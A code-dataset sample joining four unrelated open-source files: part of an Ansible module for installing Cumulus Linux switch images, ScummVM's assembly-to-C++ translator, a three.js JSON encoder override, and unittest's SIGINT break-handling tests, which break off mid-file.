slots['2'] = {}
active_slotnum = get_active_slot(module)
primary_slotnum = get_primary_slot_num(module)
for _num in range(1, 3):
slot = slots[str(_num)]
slot['version'] = get_slot_version(module, str(_num))
if _num == int(active_slotnum):
slot['active'] = True
if _num == int(primary_slotnum):
slot['primary'] = True
return slots
def get_slot_version(module, slot_num):
lsb_release = check_mnt_root_lsb_release(slot_num)
switch_firm_ver = check_fw_print_env(module, slot_num)
_version = module.sw_version
if lsb_release == _version or switch_firm_ver == _version:
return _version
elif lsb_release:
return lsb_release
else:
return switch_firm_ver
def check_mnt_root_lsb_release(slot_num):
_path = '/mnt/root-rw/config%s/etc/lsb-release' % (slot_num)
try:
lsb_release = open(_path)
lines = lsb_release.readlines()
for line in lines:
_match = re.search('DISTRIB_RELEASE=([0-9a-zA-Z.]+)', line)
if _match:
return _match.group(1).split('-')[0]
except:
pass
return None
def check_fw_print_env(module, slot_num):
cmd = None
if platform.machine() == 'ppc':
cmd = "/usr/sbin/fw_printenv -n cl.ver%s" % (slot_num)
fw_output = run_cl_cmd(module, cmd)
return fw_output[0].split('-')[0]
elif platform.machine() == 'x86_64':
cmd = "/usr/bin/grub-editenv list"
grub_output = run_cl_cmd(module, cmd)
for _line in grub_output:
_regex_str = re.compile('cl.ver' + slot_num + '=([\w.]+)-')
m0 = re.match(_regex_str, _line)
if m0:
return m0.group(1)
def get_primary_slot_num(module):
cmd = None
if platform.machine() == 'ppc':
cmd = "/usr/sbin/fw_printenv -n cl.active"
return ''.join(run_cl_cmd(module, cmd))
elif platform.machine() == 'x86_64':
cmd = "/usr/bin/grub-editenv list"
grub_output = run_cl_cmd(module, cmd)
for _line in grub_output:
_regex_str = re.compile('cl.active=(\d)')
m0 = re.match(_regex_str, _line)
if m0:
return m0.group(1)
def get_active_slot(module):
try:
cmdline = open('/proc/cmdline').readline()
except:
module.fail_json(msg='Failed to open /proc/cmdline. ' +
'Unable to determine active slot')
_match = re.search('active=(\d+)', cmdline)
if _match:
return _match.group(1)
return None
def install_img(module):
src = module.params.get('src')
_version = module.sw_version
app_path = '/usr/cumulus/bin/cl-img-install -f %s' % (src)
run_cl_cmd(module, app_path)
perform_switch_slot = module.params.get('switch_slot')
if perform_switch_slot is True:
check_sw_version(module)
else:
_changed = True
_msg = "Cumulus Linux Version " + _version + " successfully" + \
" installed in alternate slot"
module.exit_json(changed=_changed, msg=_msg)
def switch_slot(module, slotnum):
_switch_slot = module.params.get('switch_slot')
if _switch_slot is True:
app_path = '/usr/cumulus/bin/cl-img-select %s' % (slotnum)
run_cl_cmd(module, app_path)
def determine_sw_version(module):
_version = module.params.get('version')
_filename = ''
# Use _version if user defines it
if _version:
module.sw_version = _version
return
else:
_filename = module.params.get('src').split('/')[-1]
_match = re.search('\d+\W\d+\W\w+', _filename)
if _match:
module.sw_version = re.sub('\W', '.', _match.group())
return
_msg = 'Unable to determine version from file %s' % (_filename)
module.exit_json(changed=False, msg=_msg)
def check_sw_version(module):
slots = get_slot_info(module)
_version = module.sw_version
perform_switch_slot = module.params.get('switch_slot')
for _num, slot in slots.items():
if slot['version'] == _version:
if 'active' in slot:
_msg = "Version %s is installed in the active slot" \
% (_version)
module.exit_json(changed=False, msg=_msg)
else:
_msg = "Version " + _version + \
" is installed in the alternate slot. "
if 'primary' not in slot:
if perform_switch_slot is True:
switch_slot(module, _num)
_msg = _msg + \
"cl-img-select has made the alternate " + \
"slot the primary slot. " +\
"Next reboot, switch will load " + _version + "."
module.exit_json(changed=True, msg=_msg)
else:
_msg = _msg + \
"Next reboot will not load " + _version + ". " + \
"switch_slot keyword set to 'no'."
module.exit_json(changed=False, msg=_msg)
else:
if perform_switch_slot is True:
_msg = _msg + \
"Next reboot, switch will load " + _version + "."
module.exit_json(changed=False, msg=_msg)
else:
_msg = _msg + \
'switch_slot set to "no". ' + \
'No further action to take'
module.exit_json(changed=False, msg=_msg)
def main():
module = AnsibleModule(
argument_spec=dict(
src=dict(required=True, type='str'),
version=dict(type='str'),
switch_slot=dict(type='bool', choices=BOOLEANS, default=False),
),
)
determine_sw_version(module)
_url = module.params.get('src')
check_sw_version(module)
check_url(module, _url)
install_img(module)
# import module snippets
from ansible.module_utils.basic import *
# incompatible with ansible 1.4.4 - ubuntu 12.04 version
# from ansible.module_utils.urls import *
from urlparse import urlparse
import re
if __name__ == '__main__':
main()
| mit |
nemomobile-apps/scummvm | devtools/tasmrecover/tasm/cpp.py | 26 | 20440 | # ScummVM - Graphic Adventure Engine
#
# ScummVM is the legal property of its developers, whose names
# are too numerous to list here. Please refer to the COPYRIGHT
# file distributed with this source distribution.
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
#
import op, traceback, re, proc
from copy import copy
proc_module = proc
class CrossJump(Exception):
pass
def parse_bin(s):
b = s.group(1)
v = hex(int(b, 2))
#print "BINARY: %s -> %s" %(b, v)
return v
class cpp:
def __init__(self, context, namespace, skip_first = 0, blacklist = [], skip_output = [], skip_dispatch_call = False, skip_addr_constants = False, header_omit_blacklisted = False, function_name_remapping = { }):
self.namespace = namespace
fname = namespace.lower() + ".cpp"
header = namespace.lower() + ".h"
banner = """/* PLEASE DO NOT MODIFY THIS FILE. ALL CHANGES WILL BE LOST! LOOK FOR README FOR DETAILS */
/* ScummVM - Graphic Adventure Engine
*
* ScummVM is the legal property of its developers, whose names
* are too numerous to list here. Please refer to the COPYRIGHT
* file distributed with this source distribution.
*
* This program is free software; you can redistribute it and/or
* modify it under the terms of the GNU General Public License
* as published by the Free Software Foundation; either version 2
* of the License, or (at your option) any later version.
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
* You should have received a copy of the GNU General Public License
* along with this program; if not, write to the Free Software
* Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
*
*/
"""
self.fd = open(fname, "wt")
self.hd = open(header, "wt")
hid = "TASMRECOVER_%s_STUBS_H__" %namespace.upper()
self.hd.write("""#ifndef %s
#define %s
%s""" %(hid, hid, banner))
self.context = context
self.data_seg = context.binary_data
self.procs = context.proc_list
self.skip_first = skip_first
self.proc_queue = []
self.proc_done = []
self.blacklist = blacklist
self.failed = list(blacklist)
self.skip_output = skip_output
self.skip_dispatch_call = skip_dispatch_call
self.skip_addr_constants = skip_addr_constants
self.header_omit_blacklisted = header_omit_blacklisted
self.function_name_remapping = function_name_remapping
self.translated = []
self.proc_addr = []
self.used_data_offsets = set()
self.methods = []
self.fd.write("""%s
#include \"%s\"
namespace %s {
""" %(banner, header, namespace))
def expand_cb(self, match):
name = match.group(0).lower()
if len(name) == 2 and \
((name[0] in ['a', 'b', 'c', 'd'] and name[1] in ['h', 'x', 'l']) or name in ['si', 'di', 'es', 'ds', 'cs']):
return "%s" %name
if self.indirection == -1:
try:
offset,p,p = self.context.get_offset(name)
except:
pass
else:
print "OFFSET = %d" %offset
self.indirection = 0
self.used_data_offsets.add((name,offset))
return "offset_%s" % (name,)
g = self.context.get_global(name)
if isinstance(g, op.const):
value = self.expand_equ(g.value)
print "equ: %s -> %s" %(name, value)
elif isinstance(g, proc.proc):
if self.indirection != -1:
raise Exception("invalid proc label usage")
value = str(g.offset)
self.indirection = 0
else:
size = g.size
if size == 0:
raise Exception("invalid var '%s' size %u" %(name, size))
if self.indirection == 0:
value = "data.%s(k%s)" %("byte" if size == 1 else "word", name.capitalize())
elif self.indirection == -1:
value = "%s" %g.offset
self.indirection = 0
else:
raise Exception("invalid indirection %d" %self.indirection)
return value
def get_size(self, expr):
#print 'get_size("%s")' %expr
try:
v = self.context.parse_int(expr)
return 1 if v < 256 else 2
except:
pass
if re.match(r'byte\s+ptr\s', expr) is not None:
return 1
if re.match(r'word\s+ptr\s', expr) is not None:
return 2
if len(expr) == 2 and expr[0] in ['a', 'b', 'c', 'd'] and expr[1] in ['h', 'l']:
return 1
if expr in ['ax', 'bx', 'cx', 'dx', 'si', 'di', 'sp', 'bp', 'ds', 'cs', 'es', 'fs']:
return 2
m = re.match(r'[a-zA-Z_]\w*', expr)
if m is not None:
name = m.group(0)
try:
g = self.context.get_global(name)
return g.size
except:
pass
return 0
def expand_equ_cb(self, match):
name = match.group(0).lower()
g = self.context.get_global(name)
if isinstance(g, op.const):
return g.value
return str(g.offset)
def expand_equ(self, expr):
n = 1
while n > 0:
expr, n = re.subn(r'\b[a-zA-Z_][a-zA-Z0-9_]+\b', self.expand_equ_cb, expr)
expr = re.sub(r'\b([0-9][a-fA-F0-9]*)h', '0x\\1', expr)
return "(%s)" %expr
def expand(self, expr, def_size = 0):
#print "EXPAND \"%s\"" %expr
size = self.get_size(expr) if def_size == 0 else def_size
indirection = 0
seg = None
reg = True
m = re.match(r'seg\s+(.*?)$', expr)
if m is not None:
return "data"
match_id = True
m = re.match(r'offset\s+(.*?)$', expr)
if m is not None:
indirection -= 1
expr = m.group(1).strip()
m = re.match(r'byte\s+ptr\s+(.*?)$', expr)
if m is not None:
expr = m.group(1).strip()
m = re.match(r'word\s+ptr\s+(.*?)$', expr)
if m is not None:
expr = m.group(1).strip()
m = re.match(r'\[(.*)\]$', expr)
if m is not None:
indirection += 1
expr = m.group(1).strip()
m = re.match(r'(\w{2,2}):(.*)$', expr)
if m is not None:
seg_prefix = m.group(1)
expr = m.group(2).strip()
print "SEGMENT %s, remains: %s" %(seg_prefix, expr)
else:
seg_prefix = "ds"
m = re.match(r'(([abcd][xhl])|si|di|bp|sp)([\+-].*)?$', expr)
if m is not None:
reg = m.group(1)
plus = m.group(3)
if plus is not None:
plus = self.expand(plus)
else:
plus = ""
match_id = False
#print "COMMON_REG: ", reg, plus
expr = "%s%s" %(reg, plus)
expr = re.sub(r'\b([0-9][a-fA-F0-9]*)h', '0x\\1', expr)
expr = re.sub(r'\b([0-1]+)b', parse_bin, expr)
expr = re.sub(r'"(.)"', '\'\\1\'', expr)
if match_id:
#print "BEFORE: %d" %indirection
self.indirection = indirection
expr = re.sub(r'\b[a-zA-Z_][a-zA-Z0-9_]+\b', self.expand_cb, expr)
indirection = self.indirection
#print "AFTER: %d" %indirection
if indirection == 1:
if size == 1:
expr = "%s.byte(%s)" %(seg_prefix, expr)
elif size == 2:
expr = "%s.word(%s)" %(seg_prefix, expr)
else:
expr = "@invalid size 0"
elif indirection == 0:
pass
elif indirection == -1:
expr = "&%s" %expr
else:
raise Exception("invalid indirection %d" %indirection)
return expr
def mangle_label(self, name):
name = name.lower()
return re.sub(r'\$', '_tmp', name)
def resolve_label(self, name):
name = name.lower()
if not name in self.proc.labels:
try:
offset, proc, pos = self.context.get_offset(name)
except:
print "no label %s, trying procedure" %name
proc = self.context.get_global(name)
pos = 0
if not isinstance(proc, proc_module.proc):
raise CrossJump("cross-procedure jump to non label and non procedure %s" %(name))
self.proc.labels.add(name)
for i in xrange(0, len(self.unbounded)):
u = self.unbounded[i]
if u[1] == proc:
if pos < u[2]:
self.unbounded[i] = (name, proc, pos)
return self.mangle_label(name)
self.unbounded.append((name, proc, pos))
return self.mangle_label(name)
def jump_to_label(self, name):
jump_proc = False
if name in self.blacklist:
jump_proc = True
if self.context.has_global(name) :
g = self.context.get_global(name)
if isinstance(g, proc_module.proc):
jump_proc = True
if jump_proc:
if name in self.function_name_remapping:
return "{ %s(); return; }" %self.function_name_remapping[name]
else:
return "{ %s(); return; }" %name
else:
# TODO: name or self.resolve_label(name) or self.mangle_label(name)??
if name in self.proc.retlabels:
return "return /* (%s) */" % (name)
return "goto %s" %self.resolve_label(name)
def _label(self, name):
self.body += "%s:\n" %self.mangle_label(name)
def schedule(self, name):
name = name.lower()
if name in self.proc_queue or name in self.proc_done or name in self.failed:
return
print "+scheduling function %s..." %name
self.proc_queue.append(name)
def _call(self, name):
name = name.lower()
if name == 'ax':
self.body += "\t__dispatch_call(%s);\n" %self.expand('ax', 2)
return
if name in self.function_name_remapping:
self.body += "\t%s();\n" %self.function_name_remapping[name]
else:
self.body += "\t%s();\n" %name
self.schedule(name)
def _ret(self):
self.body += "\treturn;\n"
def parse2(self, dst, src):
dst_size, src_size = self.get_size(dst), self.get_size(src)
if dst_size == 0:
if src_size == 0:
raise Exception("both sizes are 0")
dst_size = src_size
if src_size == 0:
src_size = dst_size
dst = self.expand(dst, dst_size)
src = self.expand(src, src_size)
return dst, src
def _mov(self, dst, src):
self.body += "\t%s = %s;\n" %self.parse2(dst, src)
def _add(self, dst, src):
self.body += "\t_add(%s, %s);\n" %self.parse2(dst, src)
def _sub(self, dst, src):
self.body += "\t_sub(%s, %s);\n" %self.parse2(dst, src)
def _and(self, dst, src):
self.body += "\t_and(%s, %s);\n" %self.parse2(dst, src)
def _or(self, dst, src):
self.body += "\t_or(%s, %s);\n" %self.parse2(dst, src)
def _xor(self, dst, src):
self.body += "\t_xor(%s, %s);\n" %self.parse2(dst, src)
def _neg(self, dst):
dst = self.expand(dst)
self.body += "\t_neg(%s);\n" %(dst)
def _cbw(self):
self.body += "\tax.cbw();\n"
def _shr(self, dst, src):
self.body += "\t_shr(%s, %s);\n" %self.parse2(dst, src)
def _shl(self, dst, src):
self.body += "\t_shl(%s, %s);\n" %self.parse2(dst, src)
#def _sar(self, dst, src):
# self.body += "\t_sar(%s%s);\n" %self.parse2(dst, src)
#def _sal(self, dst, src):
# self.body += "\t_sal(%s, %s);\n" %self.parse2(dst, src)
#def _rcl(self, dst, src):
# self.body += "\t_rcl(%s, %s);\n" %self.parse2(dst, src)
#def _rcr(self, dst, src):
# self.body += "\t_rcr(%s, %s);\n" %self.parse2(dst, src)
def _mul(self, src):
src = self.expand(src)
self.body += "\t_mul(%s);\n" %(src)
def _div(self, src):
src = self.expand(src)
self.body += "\t_div(%s);\n" %(src)
def _inc(self, dst):
dst = self.expand(dst)
self.body += "\t_inc(%s);\n" %(dst)
def _dec(self, dst):
dst = self.expand(dst)
self.body += "\t_dec(%s);\n" %(dst)
def _cmp(self, a, b):
self.body += "\t_cmp(%s, %s);\n" %self.parse2(a, b)
def _test(self, a, b):
self.body += "\t_test(%s, %s);\n" %self.parse2(a, b)
def _js(self, label):
self.body += "\tif (flags.s())\n\t\t%s;\n" %(self.jump_to_label(label))
def _jns(self, label):
self.body += "\tif (!flags.s())\n\t\t%s;\n" %(self.jump_to_label(label))
def _jz(self, label):
self.body += "\tif (flags.z())\n\t\t%s;\n" %(self.jump_to_label(label))
def _jnz(self, label):
self.body += "\tif (!flags.z())\n\t\t%s;\n" %(self.jump_to_label(label))
def _jl(self, label):
self.body += "\tif (flags.l())\n\t\t%s;\n" %(self.jump_to_label(label))
def _jg(self, label):
self.body += "\tif (!flags.le())\n\t\t%s;\n" %(self.jump_to_label(label))
def _jle(self, label):
self.body += "\tif (flags.le())\n\t\t%s;\n" %(self.jump_to_label(label))
def _jge(self, label):
self.body += "\tif (!flags.l())\n\t\t%s;\n" %(self.jump_to_label(label))
def _jc(self, label):
self.body += "\tif (flags.c())\n\t\t%s;\n" %(self.jump_to_label(label))
def _jnc(self, label):
self.body += "\tif (!flags.c())\n\t\t%s;\n" %(self.jump_to_label(label))
def _xchg(self, dst, src):
self.body += "\t_xchg(%s, %s);\n" %self.parse2(dst, src)
def _jmp(self, label):
self.body += "\t%s;\n" %(self.jump_to_label(label))
def _loop(self, label):
self.body += "\tif (--cx)\n\t\t%s;\n" %self.jump_to_label(label)
def _push(self, regs):
p = str();
for r in regs:
r = self.expand(r)
p += "\tpush(%s);\n" %(r)
self.body += p
def _pop(self, regs):
p = str();
for r in regs:
self.temps_count -= 1
i = self.temps_count
r = self.expand(r)
p += "\t%s = pop();\n" %r
self.body += p
def _rep(self):
self.body += "\twhile(cx--)\n\t"
def _lodsb(self):
self.body += "\t_lodsb();\n"
def _lodsw(self):
self.body += "\t_lodsw();\n"
def _stosb(self, n, clear_cx):
self.body += "\t_stosb(%s%s);\n" %("" if n == 1 else n, ", true" if clear_cx else "")
def _stosw(self, n, clear_cx):
self.body += "\t_stosw(%s%s);\n" %("" if n == 1 else n, ", true" if clear_cx else "")
def _movsb(self, n, clear_cx):
self.body += "\t_movsb(%s%s);\n" %("" if n == 1 else n, ", true" if clear_cx else "")
def _movsw(self, n, clear_cx):
self.body += "\t_movsw(%s%s);\n" %("" if n == 1 else n, ", true" if clear_cx else "")
def _stc(self):
self.body += "\tflags._c = true;\n "
def _clc(self):
self.body += "\tflags._c = false;\n "
def __proc(self, name, def_skip = 0):
try:
skip = def_skip
self.temps_count = 0
self.temps_max = 0
if self.context.has_global(name):
self.proc = self.context.get_global(name)
else:
print "No procedure named %s, trying label" %name
off, src_proc, skip = self.context.get_offset(name)
self.proc = proc_module.proc(name)
self.proc.stmts = copy(src_proc.stmts)
self.proc.labels = copy(src_proc.labels)
self.proc.retlabels = copy(src_proc.retlabels)
#for p in xrange(skip, len(self.proc.stmts)):
# s = self.proc.stmts[p]
# if isinstance(s, op.basejmp):
# o, p, s = self.context.get_offset(s.label)
# if p == src_proc and s < skip:
# skip = s
self.proc_addr.append((name, self.proc.offset))
self.body = str()
if name in self.function_name_remapping:
self.body += "void %sContext::%s() {\n\tSTACK_CHECK;\n" %(self.namespace, self.function_name_remapping[name]);
else:
self.body += "void %sContext::%s() {\n\tSTACK_CHECK;\n" %(self.namespace, name);
self.proc.optimize()
self.unbounded = []
self.proc.visit(self, skip)
#adding remaining labels:
for i in xrange(0, len(self.unbounded)):
u = self.unbounded[i]
print "UNBOUNDED: ", u
proc = u[1]
for p in xrange(u[2], len(proc.stmts)):
s = proc.stmts[p]
if isinstance(s, op.basejmp):
self.resolve_label(s.label)
#adding statements
#BIG FIXME: this is quite ugly to handle code analysis from the code generation. rewrite me!
for label, proc, offset in self.unbounded:
self.body += "\treturn;\n" #we need to return before calling code from the other proc
self.body += "/*continuing to unbounded code: %s from %s:%d-%d*/\n" %(label, proc.name, offset, len(proc.stmts))
start = len(self.proc.stmts)
self.proc.add_label(label)
for s in proc.stmts[offset:]:
if isinstance(s, op.label):
self.proc.labels.add(s.name)
self.proc.stmts.append(s)
self.proc.add("ret")
print "skipping %d instructions, todo: %d" %(start, len(self.proc.stmts) - start)
print "re-optimizing..."
self.proc.optimize(keep_labels=[label])
self.proc.visit(self, start)
self.body += "}\n";
if name not in self.skip_output:
self.translated.insert(0, self.body)
self.proc = None
if self.temps_count > 0:
raise Exception("temps count == %d at the exit of proc" %self.temps_count);
return True
except (CrossJump, op.Unsupported) as e:
print "%s: ERROR: %s" %(name, e)
self.failed.append(name)
except:
raise
def get_type(self, width):
return "uint%d_t" %(width * 8)
def write_stubs(self, fname, procs):
fd = open(fname, "wt")
fd.write("namespace %s {\n" %self.namespace)
for p in procs:
if p in self.function_name_remapping:
fd.write("void %sContext::%s() {\n\t::error(\"%s\");\n}\n\n" %(self.namespace, self.function_name_remapping[p], self.function_name_remapping[p]))
else:
fd.write("void %sContext::%s() {\n\t::error(\"%s\");\n}\n\n" %(self.namespace, p, p))
fd.write("} // End of namespace %s\n" %self.namespace)
fd.close()
def generate(self, start):
#print self.prologue()
#print context
self.proc_queue.append(start)
while len(self.proc_queue):
name = self.proc_queue.pop()
if name in self.failed or name in self.proc_done:
continue
if len(self.proc_queue) == 0 and len(self.procs) > 0:
print "queue's empty, adding remaining procs:"
for p in self.procs:
self.schedule(p)
self.procs = []
print "continuing on %s" %name
self.proc_done.append(name)
self.__proc(name)
self.methods.append(name)
self.write_stubs("_stubs.cpp", self.failed)
self.methods += self.failed
done, failed = len(self.proc_done), len(self.failed)
self.fd.write("\n")
self.fd.write("\n".join(self.translated))
self.fd.write("\n")
print "%d ok, %d failed of %d, %.02g%% translated" %(done, failed, done + failed, 100.0 * done / (done + failed))
print "\n".join(self.failed)
data_bin = self.data_seg
data_impl = "\n\tstatic const uint8 src[] = {\n\t\t"
n = 0
comment = str()
for v in data_bin:
data_impl += "0x%02x, " %v
n += 1
comment += chr(v) if (v >= 0x20 and v < 0x7f and v != ord('\\')) else "."
if (n & 0xf) == 0:
data_impl += "\n\t\t//0x%04x: %s\n\t\t" %(n - 16, comment)
comment = str()
elif (n & 0x3) == 0:
comment += " "
data_impl += "};\n\tds.assign(src, src + sizeof(src));\n"
self.hd.write(
"""\n#include "dreamweb/runtime.h"
#include "dreamweb/structs.h"
#include "dreamweb/dreambase.h"
namespace %s {
"""
%(self.namespace))
if self.skip_addr_constants == False:
for name,addr in self.proc_addr:
self.hd.write("static const uint16 addr_%s = 0x%04x;\n" %(name, addr))
for name,addr in self.used_data_offsets:
self.hd.write("static const uint16 offset_%s = 0x%04x;\n" %(name, addr))
offsets = []
for k, v in self.context.get_globals().items():
if isinstance(v, op.var):
offsets.append((k.capitalize(), v.offset))
elif isinstance(v, op.const):
offsets.append((k.capitalize(), self.expand_equ(v.value))) #fixme: try to save all constants here
offsets = sorted(offsets, key=lambda t: t[1])
for o in offsets:
self.hd.write("static const uint16 k%s = %s;\n" %o)
self.hd.write("\n")
self.hd.write(
"""
class %sContext : public DreamBase, public Context {
public:
DreamGenContext(DreamWeb::DreamWebEngine *en) : DreamBase(en), Context(this) {}
void __start();
"""
%(self.namespace))
if self.skip_dispatch_call == False:
self.hd.write(
""" void __dispatch_call(uint16 addr);
""")
for p in set(self.methods):
if p in self.blacklist:
if self.header_omit_blacklisted == False:
self.hd.write("\t//void %s();\n" %p)
else:
if p in self.function_name_remapping:
self.hd.write("\tvoid %s();\n" %self.function_name_remapping[p])
else:
self.hd.write("\tvoid %s();\n" %p)
self.hd.write("};\n\n} // End of namespace DreamGen\n\n#endif\n")
self.hd.close()
self.fd.write("void %sContext::__start() { %s\t%s(); \n}\n" %(self.namespace, data_impl, start))
if self.skip_dispatch_call == False:
self.fd.write("\nvoid %sContext::__dispatch_call(uint16 addr) {\n\tswitch(addr) {\n" %self.namespace)
self.proc_addr.sort(cmp = lambda x, y: x[1] - y[1])
for name,addr in self.proc_addr:
self.fd.write("\t\tcase addr_%s: %s(); break;\n" %(name, name))
self.fd.write("\t\tdefault: ::error(\"invalid call to %04x dispatched\", (uint16)ax);")
self.fd.write("\n\t}\n}")
self.fd.write("\n} // End of namespace DreamGen\n")
self.fd.close()
| gpl-2.0 |
sufeiou/three.js | utils/exporters/blender/addons/io_three/exporter/_json.py | 296 | 6976 | import json
from .. import constants
ROUND = constants.DEFAULT_PRECISION
## THREE override function
def _json_floatstr(o):
if ROUND is not None:
o = round(o, ROUND)
return '%g' % o
def _make_iterencode(markers, _default, _encoder, _indent, _floatstr,
_key_separator, _item_separator, _sort_keys, _skipkeys, _one_shot,
## HACK: hand-optimized bytecode; turn globals into locals
ValueError=ValueError,
dict=dict,
float=float,
id=id,
int=int,
isinstance=isinstance,
list=list,
str=str,
tuple=tuple,
):
'''
Overwrite json.encoder for Python 2.7 and above to not
assign each index of a list or tuple to its own row as
this is completely asinine behaviour
'''
## @THREE
# Override the function
_floatstr = _json_floatstr
if _indent is not None and not isinstance(_indent, str):
_indent = ' ' * _indent
def _iterencode_list(lst, _current_indent_level):
if not lst:
yield '[]'
return
if markers is not None:
markerid = id(lst)
if markerid in markers:
raise ValueError("Circular reference detected")
markers[markerid] = lst
buf = '['
## @THREEJS
# - block the moronic functionality that puts each
# index on its own line causing insane row counts
#if _indent is not None:
# _current_indent_level += 1
# newline_indent = '\n' + _indent * _current_indent_level
# separator = _item_separator + newline_indent
# buf += newline_indent
#else:
newline_indent = None
separator = _item_separator
first = True
for value in lst:
if first:
first = False
else:
buf = separator
if isinstance(value, str):
yield buf + _encoder(value)
elif value is None:
yield buf + 'null'
elif value is True:
yield buf + 'true'
elif value is False:
yield buf + 'false'
elif isinstance(value, int):
yield buf + str(value)
elif isinstance(value, float):
yield buf + _floatstr(value)
else:
yield buf
if isinstance(value, (list, tuple)):
chunks = _iterencode_list(value, _current_indent_level)
elif isinstance(value, dict):
chunks = _iterencode_dict(value, _current_indent_level)
else:
chunks = _iterencode(value, _current_indent_level)
for chunk in chunks:
yield chunk
if newline_indent is not None:
_current_indent_level -= 1
yield '\n' + _indent * _current_indent_level
yield ']'
if markers is not None:
del markers[markerid]
def _iterencode_dict(dct, _current_indent_level):
if not dct:
yield '{}'
return
if markers is not None:
markerid = id(dct)
if markerid in markers:
raise ValueError("Circular reference detected")
markers[markerid] = dct
yield '{'
if _indent is not None:
_current_indent_level += 1
newline_indent = '\n' + _indent * _current_indent_level
item_separator = _item_separator + newline_indent
yield newline_indent
else:
newline_indent = None
item_separator = _item_separator
first = True
if _sort_keys:
items = sorted(dct.items(), key=lambda kv: kv[0])
else:
items = dct.items()
for key, value in items:
if isinstance(key, str):
pass
# JavaScript is weakly typed for these, so it makes sense to
# also allow them. Many encoders seem to do something like this.
elif isinstance(key, float):
key = _floatstr(key)
elif key is True:
key = 'true'
elif key is False:
key = 'false'
elif key is None:
key = 'null'
elif isinstance(key, int):
key = str(key)
elif _skipkeys:
continue
else:
raise TypeError("key " + repr(key) + " is not a string")
if first:
first = False
else:
yield item_separator
yield _encoder(key)
yield _key_separator
if isinstance(value, str):
yield _encoder(value)
elif value is None:
yield 'null'
elif value is True:
yield 'true'
elif value is False:
yield 'false'
elif isinstance(value, int):
yield str(value)
elif isinstance(value, float):
yield _floatstr(value)
else:
if isinstance(value, (list, tuple)):
chunks = _iterencode_list(value, _current_indent_level)
elif isinstance(value, dict):
chunks = _iterencode_dict(value, _current_indent_level)
else:
chunks = _iterencode(value, _current_indent_level)
for chunk in chunks:
yield chunk
if newline_indent is not None:
_current_indent_level -= 1
yield '\n' + _indent * _current_indent_level
yield '}'
if markers is not None:
del markers[markerid]
def _iterencode(o, _current_indent_level):
if isinstance(o, str):
yield _encoder(o)
elif o is None:
yield 'null'
elif o is True:
yield 'true'
elif o is False:
yield 'false'
elif isinstance(o, int):
yield str(o)
elif isinstance(o, float):
yield _floatstr(o)
elif isinstance(o, (list, tuple)):
for chunk in _iterencode_list(o, _current_indent_level):
yield chunk
elif isinstance(o, dict):
for chunk in _iterencode_dict(o, _current_indent_level):
yield chunk
else:
if markers is not None:
markerid = id(o)
if markerid in markers:
raise ValueError("Circular reference detected")
markers[markerid] = o
o = _default(o)
for chunk in _iterencode(o, _current_indent_level):
yield chunk
if markers is not None:
del markers[markerid]
return _iterencode
# override the encoder
json.encoder._make_iterencode = _make_iterencode
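# Rough illustration of the intended effect (not part of the exporter): with
# the override installed, dumping with an indent keeps whole lists on a single
# row instead of one element per row, e.g.
#
#   json.dumps({"vertices": [0, 1, 2]}, indent=4)
#   # -> '{\n    "vertices": [0,1,2]\n}'   (the list stays on one line)
#
# whereas the stock pure-Python encoder would emit 0, 1 and 2 each on its own
# indented line.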
| mit |
40223225/2015-cdb-g3-test2- | static/Brython3.1.1-20150328-091302/Lib/unittest/test/test_break.py | 785 | 8138 | import gc
import io
import os
import sys
import signal
import weakref
import unittest
@unittest.skipUnless(hasattr(os, 'kill'), "Test requires os.kill")
@unittest.skipIf(sys.platform =="win32", "Test cannot run on Windows")
@unittest.skipIf(sys.platform == 'freebsd6', "Test kills regrtest on freebsd6 "
"if threads have been used")
class TestBreak(unittest.TestCase):
def setUp(self):
self._default_handler = signal.getsignal(signal.SIGINT)
def tearDown(self):
signal.signal(signal.SIGINT, self._default_handler)
unittest.signals._results = weakref.WeakKeyDictionary()
unittest.signals._interrupt_handler = None
def testInstallHandler(self):
default_handler = signal.getsignal(signal.SIGINT)
unittest.installHandler()
self.assertNotEqual(signal.getsignal(signal.SIGINT), default_handler)
try:
pid = os.getpid()
os.kill(pid, signal.SIGINT)
except KeyboardInterrupt:
self.fail("KeyboardInterrupt not handled")
self.assertTrue(unittest.signals._interrupt_handler.called)
def testRegisterResult(self):
result = unittest.TestResult()
unittest.registerResult(result)
for ref in unittest.signals._results:
if ref is result:
break
elif ref is not result:
self.fail("odd object in result set")
else:
self.fail("result not found")
def testInterruptCaught(self):
default_handler = signal.getsignal(signal.SIGINT)
result = unittest.TestResult()
unittest.installHandler()
unittest.registerResult(result)
self.assertNotEqual(signal.getsignal(signal.SIGINT), default_handler)
def test(result):
pid = os.getpid()
os.kill(pid, signal.SIGINT)
result.breakCaught = True
self.assertTrue(result.shouldStop)
try:
test(result)
except KeyboardInterrupt:
self.fail("KeyboardInterrupt not handled")
self.assertTrue(result.breakCaught)
def testSecondInterrupt(self):
result = unittest.TestResult()
unittest.installHandler()
unittest.registerResult(result)
def test(result):
pid = os.getpid()
os.kill(pid, signal.SIGINT)
result.breakCaught = True
self.assertTrue(result.shouldStop)
os.kill(pid, signal.SIGINT)
self.fail("Second KeyboardInterrupt not raised")
try:
test(result)
except KeyboardInterrupt:
pass
else:
self.fail("Second KeyboardInterrupt not raised")
self.assertTrue(result.breakCaught)
def testTwoResults(self):
unittest.installHandler()
result = unittest.TestResult()
unittest.registerResult(result)
new_handler = signal.getsignal(signal.SIGINT)
result2 = unittest.TestResult()
unittest.registerResult(result2)
self.assertEqual(signal.getsignal(signal.SIGINT), new_handler)
result3 = unittest.TestResult()
def test(result):
pid = os.getpid()
os.kill(pid, signal.SIGINT)
try:
test(result)
except KeyboardInterrupt:
self.fail("KeyboardInterrupt not handled")
self.assertTrue(result.shouldStop)
self.assertTrue(result2.shouldStop)
self.assertFalse(result3.shouldStop)
def testHandlerReplacedButCalled(self):
